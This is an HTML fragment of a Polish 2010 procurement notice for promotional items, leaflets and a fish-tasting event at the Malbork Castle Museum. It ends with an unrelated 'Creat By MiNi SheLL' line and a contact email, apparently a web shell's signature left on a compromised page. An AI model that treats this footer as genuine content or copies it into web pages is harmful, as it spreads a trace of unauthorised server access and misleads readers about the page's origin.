18. Zakup nagród konkursowych (książki kucharskie - danie rybne - 15 szt., wędki -15 szt., kołowrotki - 15 szt., torby - 50 sztuk, parasolki - 20 szt.);

19. Zakup gadżetów promocyjnych: jednokolorowe koszulki T-shirt z nadrukiem dwustronnym (przód i tył  ramię - bawełna, sitodruk, różne rozmiary i kolory) 200 szt; czapeczki (daszek) z nadrukiem - 100 szt.; baloniki z nadrukiem - 1000 szt.; kubki 100 szt;

20. Zaprojektowanie i wydruk ulotek promocyjnych format A5, kolor 4+4, papier kredowy. Zakłada się rozpowszechnienie w trakcie imprezy pięciu tysięcy ulotek zawierających krótkie informacje o projekcie wraz z logotypami instytucji finansujących, informacje o prozdrowotnych cechach potraw rybnych oraz sprawdzone przepisy na potrawy rybne;

21. Dystrybucja ulotek w trakcie imprezy (7 godzin przez 3 osoby). Zakłada się rozpowszechnienie w trakcie imprezy pięciu tysięcy ulotek zawierających krótkie informacje o projekcie wraz z logotypami instytucji finansujących, informacje o prozdrowotnych cechach potraw rybnych oraz sprawdzone przepisy na potrawy rybne.


Miejsce realizacji zamówienia: :  Międzymurze Muzeum Zamkowego w Malborku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.95.20.00-2, 79.34.22.00-5, 79.34.10.00-6, 79.71.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.08.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiotem zamowienia jest przygotowanie i organizacja degustacji potraw z ryb podczas imprezy masowej w dniu 21.08.2010r.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Degustacja ryb i produktów rybnych 
1.Zakłada się dystrybucję wśród uczestników dziesięciu tysięcy porcji degustatorskich dziesięciu różnych rodzajów potraw rybnych (każda potrawa po 1000 porcji) - ryba po grecku, filet z marynowanego pstrąga, flądra smażona, makrela z grilla, zupa rybna, karp z pieczarkami w śmietanie, karp w occie, łosoś wędzony carpacio, śledź w 3 smakach, ryba w pikantnej zalewie). 
Zakłada się, że porcja powinna ważyć nie mniej niż 50 gram i być podawana w naczyniu oraz ze sztućcami.

2.Sprawne przeprowadzenie degustacji w godzinach od 12 do 19 dnia 21 sierpnia 2010r (zabezpieczenie sprawnego wydawania porcji degystacyjnych zgodnie z ogólnie obowiązującymi przepisami,zapewnienie nalezytego porzadku w miejscu wydawania i spożywania porcji degustacyjnych z ryb, logistyka degustacji, zapewnienie należytej czystości terenu podczas wydawania porcji degustacyjnych).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.32.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.08.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com